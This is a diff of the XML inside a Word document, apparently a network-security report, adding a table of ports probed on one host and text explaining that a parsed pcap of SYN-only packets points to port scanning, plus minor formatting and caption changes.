+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>548</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>5000</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>1917</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>53</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>161</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>9001</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>65535</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>443</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>113</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>993</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>8080</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>2869</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Do you wish to see if it was a port scan? (y/n): IP: 10.100.25.14 : True </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">As we can see the parsed pcap file has shown us the IP and the respective ports that were checked. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>hese tabulated results are all caused by TCP-Half-open packets with only SYN flag set in an attempt to see if a port was open by waiting for a SYN-ACK response.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Thus,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> we have identified a potential </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Port scanning activity. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -2011,13 +3398,7 @@
         <w:rPr>
           <w:sz w:val="28"/>
         </w:rPr>
-        <w:t>Forming Malformed Packets</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>Forming Malformed Packets:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2111,6 +3492,7 @@
           <w:tab w:val="left" w:pos="14656"/>
         </w:tabs>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:iCs/>
           <w:sz w:val="24"/>
@@ -2155,7 +3537,7 @@
         </w:rPr>
         <w:t xml:space="preserve">SOURCE: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId8" w:history="1">
+      <w:hyperlink r:id="rId9" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2214,7 +3596,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9">
+                    <a:blip r:embed="rId10">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2388,327 +3770,6 @@
                   </wp:wrapPolygon>
                 </wp:wrapTight>
                 <wp:docPr id="13" name="Text Box 13"/>
-                <wp:cNvGraphicFramePr/>
-                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
-                    <wps:wsp>
-                      <wps:cNvSpPr txBox="1"/>
-                      <wps:spPr>
-                        <a:xfrm>
-                          <a:off x="0" y="0"/>
-                          <a:ext cx="4474210" cy="635"/>
-                        </a:xfrm>
-                        <a:prstGeom prst="rect">
-                          <a:avLst/>
-                        </a:prstGeom>
-                        <a:solidFill>
-                          <a:prstClr val="white"/>
-                        </a:solidFill>
-                        <a:ln>
-                          <a:noFill/>
-                        </a:ln>
-                      </wps:spPr>
-                      <wps:txbx>
-                        <w:txbxContent>
-                          <w:p>
-                            <w:pPr>
-                              <w:pStyle w:val="Caption"/>
-                              <w:jc w:val="center"/>
-                              <w:rPr>
-                                <w:sz w:val="22"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:sz w:val="22"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">Figure </w:t>
-                            </w:r>
-                            <w:r>
-                              <w:rPr>
-                                <w:sz w:val="22"/>
-                              </w:rPr>
-                              <w:t>1</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:rPr>
-                                <w:sz w:val="22"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">. </w:t>
-                            </w:r>
-                            <w:r>
-                              <w:rPr>
-                                <w:sz w:val="22"/>
-                              </w:rPr>
-                              <w:t>A basic Ethernet and TCP</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:rPr>
-                                <w:sz w:val="22"/>
-                              </w:rPr>
-                              <w:t>/</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:rPr>
-                                <w:sz w:val="22"/>
-                              </w:rPr>
-                              <w:t>IP packet</w:t>
-                            </w:r>
-                          </w:p>
-                        </w:txbxContent>
-                      </wps:txbx>
-                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
-                        <a:prstTxWarp prst="textNoShape">
-                          <a:avLst/>
-                        </a:prstTxWarp>
-                        <a:spAutoFit/>
-                      </wps:bodyPr>
-                    </wps:wsp>
-                  </a:graphicData>
-                </a:graphic>
-              </wp:anchor>
-            </w:drawing>
-          </mc:Choice>
-          <mc:Fallback>
-            <w:pict>
